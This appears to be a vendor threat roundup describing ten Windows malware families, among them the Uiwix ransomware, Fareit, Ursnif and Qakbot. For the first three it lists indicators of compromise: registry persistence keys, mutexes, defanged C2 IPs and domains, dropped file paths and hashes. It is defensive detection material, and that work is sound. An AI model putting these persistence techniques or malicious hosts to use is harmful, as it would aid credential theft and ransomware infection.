The most prevalent threats highlighted in this roundup are:

  • Win.Malware.Shadowbrokers-6958490-0
    Malware
    Uiwix uses ETERNALBLUE and DOUBLEPULSAR to install ransomware on the infected system. Encrypted file names include "UIWIX" as part of the file extension. Unlike the well-known WannaCry ransomware, Uiwix doesn't "worm itself." It only installs itself on the system.
     
  • Win.Malware.Fareit-6958493-0
    Malware
    The Fareit trojan is primarily an information stealer that downloads and installs other malware.
     
  • Win.Malware.Ursnif-6957672-0
    Malware
    Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
     
  • Win.Ransomware.Cerber-6957317-0
    Ransomware
    Cerber is ransomware that encrypts documents, photos, databases and other important files using the file extension ".cerber."
     
  • Win.Dropper.Nymaim-6956636-0
    Dropper
    Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
     
  • Win.Dropper.Qakbot-6956539-0
    Dropper
    Qakbot, aka Qbot, has been around for since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB.
     
  • Win.Malware.Tovkater-6956309-0
    Malware
    This malware is able to download and upload files, inject malicious code and install additional malware.
     
  • Doc.Downloader.Powload-6956274-0
    Downloader
    Powload is a malicious document that uses PowerShell to download malware. This campaign is currently distributing Emotet malware.
     
  • Win.Dropper.Kovter-6956146-0
    Dropper
    Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
     
  • Win.Trojan.Razy-6956092-0
    Trojan
    Razy is oftentimes a generic detection name for a Windows trojan. This cluster of samples contains encrypted code in the resources section that could be injected to a legitimate process.
     

Threats

Win.Malware.Shadowbrokers-6958490-0


Indicators of Compromise


Registry KeysOccurrences
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABC\INDEXES\FileIdIndex-{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963} 19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB7
Value Name: _FileId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB7\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
Value Name: 100000000928D
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB7
Value Name: AeFileID
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB8
Value Name: _FileId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB8\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
Value Name: 1000000009511
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB8
Value Name: AeFileID
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB9
Value Name: _FileId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB9\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
Value Name: 1000000009362
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB9
Value Name: AeFileID
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABA
Value Name: _ObjectId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABA
Value Name: _FileId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABA
Value Name: _Usn_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABA
Value Name: _UsnJournalId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABA\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
Value Name: 1000000009363
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABA
Value Name: AeFileID
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABA
Value Name: AeProgramID
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABB
Value Name: _ObjectId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABB
Value Name: _FileId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABB
Value Name: _Usn_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABB
Value Name: _UsnJournalId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABB\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
Value Name: 10000000095D4
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABB
Value Name: AeFileID
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABB
Value Name: AeProgramID
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABC
Value Name: _ObjectId_
19
MutexesOccurrences
Global\2f6e8021-6b52-11e9-a007-00501e3ae7b51
Global\2f7cc861-6b52-11e9-a007-00501e3ae7b51
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
69[.]55[.]1[.]14618
69[.]55[.]1[.]10018
69[.]55[.]4[.]19618
69[.]55[.]2[.]20118
69[.]55[.]4[.]15518
69[.]55[.]2[.]13118
69[.]55[.]4[.]17918
69[.]55[.]4[.]17818
69[.]55[.]2[.]13018
69[.]55[.]4[.]21718
69[.]55[.]1[.]3618
69[.]55[.]1[.]3718
69[.]55[.]4[.]17118
69[.]55[.]4[.]17018
69[.]55[.]4[.]17318
69[.]55[.]4[.]17218
69[.]55[.]1[.]3018
69[.]55[.]4[.]17418
69[.]55[.]4[.]17718
69[.]55[.]4[.]17618
69[.]55[.]5[.]7518
69[.]55[.]5[.]7418
69[.]55[.]5[.]7918
69[.]55[.]5[.]7818
69[.]55[.]5[.]8118
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
v4[.]ipv6-test[.]com11
sex[.]kuai-go[.]com4
ilo[.]brenz[.]pl1
teetah[.]com1
thmqyo[.]com1
iadaef[.]com1
yvyqyr[.]com1
yyhhwt[.]com1
yoiupy[.]com1
abvyoh[.]com1
evoyci[.]com1
nzooyn[.]com1
niulzo[.]com1
meadgz[.]com1
yxpwly[.]com1
cberyk[.]com1
xuvvie[.]com1
nfgesv[.]com1
rjodmz[.]com1
ygjuju[.]com1
iauany[.]com1
zopkpn[.]com1
ubnuov[.]com1
kroqzu[.]com1
uxmaie[.]com1
See JSON for more IOCs
Files and or directories createdOccurrences
%SystemRoot%\Fonts\Mysql21
%SystemRoot%\Fonts\Mysql\bat.bat21
%SystemRoot%\Fonts\Mysql\Doublepulsar.dll20
%SystemRoot%\Fonts\Mysql\Doublepulsar2.dll20
%SystemRoot%\Fonts\Mysql\Eter.exe20
%SystemRoot%\Fonts\Mysql\Eter.xml20
%SystemRoot%\Fonts\Mysql\Eternalblue.dll20
%SystemRoot%\Fonts\Mysql\Eternalblue2.dll20
%SystemRoot%\Fonts\Mysql\NansHou.dll20
%SystemRoot%\Fonts\Mysql\cmd.bat20
%SystemRoot%\Fonts\Mysql\cnli-1.dll20
%SystemRoot%\Fonts\Mysql\coli-0.dll20
%SystemRoot%\Fonts\Mysql\crli-0.dll20
%SystemRoot%\Fonts\Mysql\dmgd-4.dll20
%SystemRoot%\Fonts\Mysql\exma-1.dll20
%SystemRoot%\Fonts\Mysql\file.txt20
%SystemRoot%\Fonts\Mysql\libeay32.dll20
%SystemRoot%\Fonts\Mysql\libxml2.dll20
%SystemRoot%\Fonts\Mysql\loab.bat20
%SystemRoot%\Fonts\Mysql\load.bat20
%SystemRoot%\Fonts\Mysql\mance.exe20
%SystemRoot%\Fonts\Mysql\mance.xml20
%SystemRoot%\Fonts\Mysql\nei.bat20
%SystemRoot%\Fonts\Mysql\p.txt20
%SystemRoot%\Fonts\Mysql\poab.bat20
See JSON for more IOCs
File Hashes
  • 00e8030802e8f6b32c9e9b5167ba6854797af91947d605889b5dba3b2a29b74e
  • 054441dbcac05960e2ba1ae81903f4ed48786be51aeb346f4c2cc1162ba1749f
  • 0fa0b6d80e850f42f7d17681b2ff2147694053aa4680ddfcf632ee89d183a6fc
  • 16488c72a0c92c8a72dc78ee9d52cfc4ebf8a6392d9f91f2c966fc99abe05a03
  • 181ce9db0dea2a3a2e08860620c3015e61995a93729cb07e0b157d0e75c73343
  • 229ab5a9502a4f9efaf6b1ae193d49cd529479e4adf0475caa80f0086dd20c31
  • 23e3a6d9ce11a9ceef4f1a0731368a85587d612063d67fb518156fa88e20a277
  • 5a831048eaeed5fa07ae830ebe1ac176cdffd0764a978c89228f45125a8c07c3
  • 749cdaf3de5490da6a5c1900b415e1a10cba45d19593ca98378781d9488b6bee
  • 77f5a8b8c3d9091b5d3f050b2ac6183a9bfb86e8fd1085e96926c513c69cbffb
  • 811fc3535e7e4e67164d12a3a8a5d839365873b53e20f1ac3b5638cba279d0e9
  • 96799361f9e214dcdb35d14f3b93e35736d4f5e11a25e4672989c9b436ee6cdc
  • a013f2631ac35d43652d5ab7fd30e71187398b5c6ede6081fa6c73fb3f0b469a
  • ac80e17388fbd1f59b80c411d1449ce90a4ce5ada9d6ced63dc9890bfe5249ea
  • c29ae0b2992a0320c5d584a7af6ff8dfc590140d0652aa22b374a8b6946a76f3
  • c74a2a95439224bdef39354f37ccb4ded7ce7ba071aac9d5efe505cdb7a828ac
  • db1b669b7daffcb3b6be5ba635afe5890d85e3f734a74e9a97c864ebb23ffd30
  • dc814196d52db10a9231754a3c33b58af9c995490a16c20328a954d8c1918589
  • e3e7c5bcb49da52952d85f30efbc86830536593e96e6b29f05f22ac14e208ce5
  • e6d879189c9cfe58aa9f83856eb4849caee841eb71557522c14d38bdd8bc8efe
  • fcad77aba9a0290e0f25b0512ceadf102aff36c955a319275b3f44565d53c383

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Fareit-6958493-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: internat.exe
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: AGP Manager
3
<HKLM>\Software\Wow6432Node\Microsoft\Tracing\RASAPI32 2
<HKLM>\Software\Wow6432Node\Microsoft\Tracing\RASMANCS 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: EnableFileTracing
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: EnableConsoleTracing
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: FileTracingMask
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: ConsoleTracingMask
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: MaxFileSize
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: FileDirectory
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: EnableFileTracing
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: EnableConsoleTracing
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: FileTracingMask
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: ConsoleTracingMask
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: MaxFileSize
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: FileDirectory
2
<HKCU>\Software\Microsoft\Windows Script Host\Settings 2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
Value Name: AGP Manager.job
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
Value Name: AGP Manager.job.fp
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER
Value Name: Index
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
Value Name: AGP Manager Task.job
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
Value Name: AGP Manager Task.job.fp
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER TASK
Value Name: Index
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER
Value Name: Id
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER TASK
Value Name: Id
2
MutexesOccurrences
A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A2
Remcos_Mutex_Inj1
rdyboost_Perf_Library_Lock_PID_2101
usbhub_Perf_Library_Lock_PID_2101
.NET CLR Data_Perf_Library_Lock_PID_5b81
.NET CLR Networking 4.0.0.0_Perf_Library_Lock_PID_5b81
.NET CLR Networking_Perf_Library_Lock_PID_5b81
.NET Data Provider for Oracle_Perf_Library_Lock_PID_5b81
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_5b81
.NET Memory Cache 4.0_Perf_Library_Lock_PID_5b81
.NETFramework_Perf_Library_Lock_PID_5b81
ASP.NET_1.1.4322_Perf_Library_Lock_PID_5b81
ASP.NET_4.0.30319_Perf_Library_Lock_PID_5b81
ASP.NET_Perf_Library_Lock_PID_5b81
BITS_Perf_Library_Lock_PID_5b81
ESENT_Perf_Library_Lock_PID_5b81
Lsa_Perf_Library_Lock_PID_5b81
MSDTC Bridge 3.0.0.0_Perf_Library_Lock_PID_5b81
MSDTC Bridge 4.0.0.0_Perf_Library_Lock_PID_5b81
MSDTC_Perf_Library_Lock_PID_5b81
Outlook_Perf_Library_Lock_PID_5b81
PerfDisk_Perf_Library_Lock_PID_5b81
PerfNet_Perf_Library_Lock_PID_5b81
PerfOS_Perf_Library_Lock_PID_5b81
PerfProc_Perf_Library_Lock_PID_5b81
See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
47[.]254[.]132[.]2172
5[.]8[.]88[.]2132
91[.]192[.]100[.]41
185[.]165[.]153[.]191
91[.]193[.]75[.]331
194[.]5[.]99[.]41
103[.]200[.]5[.]1861
185[.]165[.]153[.]1351
105[.]112[.]98[.]981
129[.]205[.]112[.]1321
212[.]7[.]192[.]2411
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
snooper112[.]ddns[.]net1
harryng[.]ddns[.]net1
popen[.]ru1
hfgdhgjkgf[.]ru1
rtyrtygjgf[.]ru1
icabodgroup[.]hopto[.]org1
Files and or directories createdOccurrences
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C53
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat3
%ProgramFiles(x86)%\AGP Manager3
%ProgramFiles(x86)%\AGP Manager\agpmgr.exe3
%System32%\Tasks\AGP Manager2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\task.dat2
%APPDATA%\Install2
%APPDATA%\Install\Host.exe2
%System32%\Tasks\AGP Manager Task2
%ProgramData%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol1
%LOCALAPPDATA%\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol1
%APPDATA%\remcos1
%APPDATA%\remcos\logs.dat1
%APPDATA%\remcos\remcos.exe1
%System32%\drivers\etc\hosts1
%APPDATA%\Screenshots1
%TEMP%\install.vbs1
\??\scsi#disk&ven_red_hat&prod_virtio#4&2556063a&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1
%TEMP%\MyttloApp1
%TEMP%\tmpD22A.tmp1
%TEMP%\subos1
%TEMP%\tmpD4E9.tmp1
%TEMP%\subos\subose.exe1
See JSON for more IOCs
File Hashes
  • 0758f55d7c977e33b0c64c6bdf273d1fc639440505d3f015c5d519dc6200017f
  • 17537f41d384c9a3fe385e6ec51feacf23dcab755b26e274bddcb25ad51f3b20
  • 3409a0970239cd2fc61b66db3c6e7c49921b2c828b59530e37dc34504ee46081
  • 446166d1a9e7e1b7e12547510f7de7bc4c281681cce1f9f8576fce9de7b1dc05
  • 5c0016d2122382734395929696e2d737162f797bb4e21ab1cb9af7c9429823bf
  • 63053625336da966b1c41eae9b39dfc6dd6829be50852d657f48cf6351102955
  • 71795cda989e98003d22a59a88951ce0c2b1dd472b5c1bea4f79f03e0f22747c
  • 7634476cf6e1d538bbf9b5dc0b2dad3f55d78a7a0699f0aa3ec1a926867b602d
  • b0ab801164d28470c2e76fa775ace286b9c218eed099373ba6a6b879cb9473f4
  • c433ec83fd1ab4c370c218feda1fde4514573278464cff96c053479d5c6aea95
  • c68c68c512cd5b66fbc56df273f55bc8e9db9e5c3840dc28d905ca676029f86b
  • dfaf92e94e698ded2dfec6fde877118a2ed30d2709ce8c431d35ca3ce9d7f836
  • e6a4c246c552c5152b500443a603304bac2edbeb2925c4da2e3bf457351b66c1
  • f08bf06ef32de3aea50ded12434753f08c336408715fdcc7ab263cf95892bd5b
  • f5f336ac45dec2fa199ce54cc93035967037f7550ad9ddc89f9dfc91918d57c8

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Ursnif-6957672-0


Indicators of Compromise


Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\JAVASOFT\JAVA WEB START\1.6.0_41
Value Name: Home
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY
Value Name: AddToFavoritesInitialSelection
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY
Value Name: AddToFeedsInitialSelection
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\WINDOWSSEARCH
Value Name: Version
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\RECOVERY\PENDINGRECOVERY
Value Name: AdminActive
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP
Value Name: ChangeNotice
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MINIE
Value Name: TabBandWidth
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}
Value Name: NewInstallPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}
Value Name: CompatBlockPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
Value Name: NewInstallPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
Value Name: CompatBlockPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}
Value Name: NewInstallPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}
Value Name: CompatBlockPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
Value Name: NewInstallPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
Value Name: CompatBlockPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
Value Name: NewInstallPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
Value Name: CompatBlockPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{DBC80044-A445-435B-BC74-9C25C1C588A9}
Value Name: NewInstallPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{DBC80044-A445-435B-BC74-9C25C1C588A9}
Value Name: CompatBlockPromptCount
19
<HKU>\Software\Microsoft\Internet Explorer\Recovery\Active 19
<HKU>\Software\Microsoft\CTF\TIP\{1188450c-fdab-47ae-80d8-c9633f71be64}\LanguageProfile\0x00000000\{63800dac-e7ca-4df9-9a5c-20765055488d} 19
<HKLM>\SOFTWARE\Classes\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32 19
<HKU>\Software\Microsoft\Internet Explorer\Suggested Sites 19
<HKU>\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links 19
<HKU>\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore 19
MutexesOccurrences
!PrivacIE!SharedMem!Mutex19
Local\VERMGMTBlockListFileMutex19
Local\!BrowserEmulation!SharedMemory!Mutex19
Local\URLBLOCK_DOWNLOAD_MUTEX19
Local\URLBLOCK_HASHFILESWITCH_MUTEX19
UpdatingNewTabPageData19
{5312EE61-79E3-4A24-BFE1-132B85B23C3A}19
{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}19
{A7AAF118-DA27-71D5-1CCB-AE35102FC239}18
Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}18
Local\{7FD07DA6-D223-0971-D423-264D4807BAD1}18
Local\{B1443895-5CF6-0B1E-EE75-506F02798413}18
CommunicationManager_Mutex15
SmartScreen_AppRepSettings_Mutex15
SmartScreen_ClientId_Mutex15
Local\URLBLOCK_FILEMAPSWITCH_MUTEX_17606
{33B6645E-F685-DDC4-9817-8A614C3B5E25}6
{9FB8F914-72AD-292E-7443-C66DE8275AF1}4
{EF2CA93C-8275-F9B6-0493-D63D78776AC1}3
{1FE6DE6D-F2FC-A937-F4C3-46ED68A7DA71}3
Local\URLBLOCK_FILEMAPSWITCH_MUTEX_19163
{27CB7058-5ACE-F149-9C4B-2EB590AF42B9}3
\BaseNamedObjects\Local\{FCAA51DD-2B0A-8E99-95F0-8FA2992433F6}3
\BaseNamedObjects\Local\{6AE7CB31-C1EF-2C06-9B3E-8520FF528954}3
\BaseNamedObjects\Local\{72534A3F-299C-7437-43C6-6DE8275AF19C}3
See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
204[.]79[.]197[.]20019
185[.]193[.]141[.]6019
208[.]67[.]222[.]22218
194[.]147[.]35[.]9518
13[.]107[.]21[.]20013
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
vmelynaa[.]club19
resolver1[.]opendns[.]com18
222[.]222[.]67[.]208[.]in-addr[.]arpa18
myip[.]opendns[.]com18
ciemona[.]top18
zwbaoeladiou[.]xyz16
fqwalfredoesheridan[.]info16
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\Preferred19
%LOCALAPPDATA%Low\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico19
%LOCALAPPDATA%\Microsoft\Windows\WebCache\V0100008.log19
%LOCALAPPDATA%\Microsoft\Windows\WebCache\V0100009.log19
%LOCALAPPDATA%\Microsoft\Windows\WebCache\V010000A.log19
%LOCALAPPDATA%\Microsoft\Windows\WebCache\V010000B.log19
%LOCALAPPDATA%\Microsoft\Windows\WebCache\V010000D.log19
%LOCALAPPDATA%\Microsoft\Windows\WebCache\V010000F.log19
%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5\MSHist012018082820180829\container.dat19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\suggestions[2].en-US19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\favicon[2].ico19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\views[2]19
%LOCALAPPDATA%\Microsoft\Internet Explorer\imagestore\aowwxkh\imagestore.dat19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\favicon[1].ico19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\favicon[2].png19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\6YL4T24G\views[1]19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\favicon[1].ico19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL219
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW19
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\desktop.ini19
%TEMP%\www2.tmp19
%TEMP%\www3.tmp19
%TEMP%\www4.tmp19
%HOMEPATH%\Favorites\Links\Suggested Sites.url19
%HOMEPATH%\Local Settings\Application Data\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Suggested Sites~.feed-ms19
See JSON for more IOCs
File Hashes
  • 0870f99237954ec3b6c5d2bef78a68484ec211bdd3f98439570d6a316c8a15ee
  • 395a5bb5a15f3d0c277835b62372c985cf718cdd2b1a5a504b5e9433c5dab8a5
  • 44e6613a20fda10678242f331152b6377edc18a3bbece8a7546ef54fe2dbb9d2
  • 4509bfad5dacb2f5ac43483fb991fa5bba25b90a46a1829d5d812be529dff930
  • 5bdab30c2318e1a15917c5a5fa5a970845e473c3df7e3baf134393d9fe7dd1c5
  • 6c29026c61c2bcf1502ffa77b56d2b41504598e6b660cb4f4aadeef547248861
  • 8caac9f128ef6d7cd20ad6395b16fc180456eed45d86b68b49b87b4b57aa0142
  • 8cc7ec0c3662c3e68a0063f9aa37943eb83ac6cd472a76f9f047e0fad21f9875
  • 8df6c10dd50118b2fc7bd380d0423ad0d7a36630f2f6be81fe508eb0b7d409cb
  • b824f4bb9174eda6738710e1fed13a74088e2c23d8c31ce81ecde3cd03260396
  • c3f72c971d83fd3ac32d8bbee2d94fe78bcbde553212f3e4c3d626a8d124ccb6
  • d1d54cc60dfc5957d76c37218d89bf59aaa45c4cc45067af83429280463923e5
  • e450ad1c3dad95a579f43bf2deb9b58acc8c661e0090a162da75dd66ef608e8b
  • e7f7e41a55b11e5aee84f519b267c19c5943ca923b8c05d3aff99a47ab074f58
  • f1fc8274b0155470b6983ba68c70ea5df59196ae8b89366fc4fe922575719536
  • f58c95835e8a08cbef55c00ae86d03399302cdf7d500ab499f312156f275f2f9
  • f5e3128f71497dd5ee29c05296c3815466fd2eacc714ce914771d0ede672639c
  • fb7592a3c2994ba426046328c87f08574c7d367b0c75e206ddfd32cc5d7bfcd0
  • fb76a896e5ead6658b589c20e715fe18ffec03b9f57f895e14a0d43574de71e3

Coverage


Screenshots of Detection

AMP

ThreatGrid

Win.Ransomware.Cerber-6957317-0


Indicators of Compromise


Registry KeysOccurrences
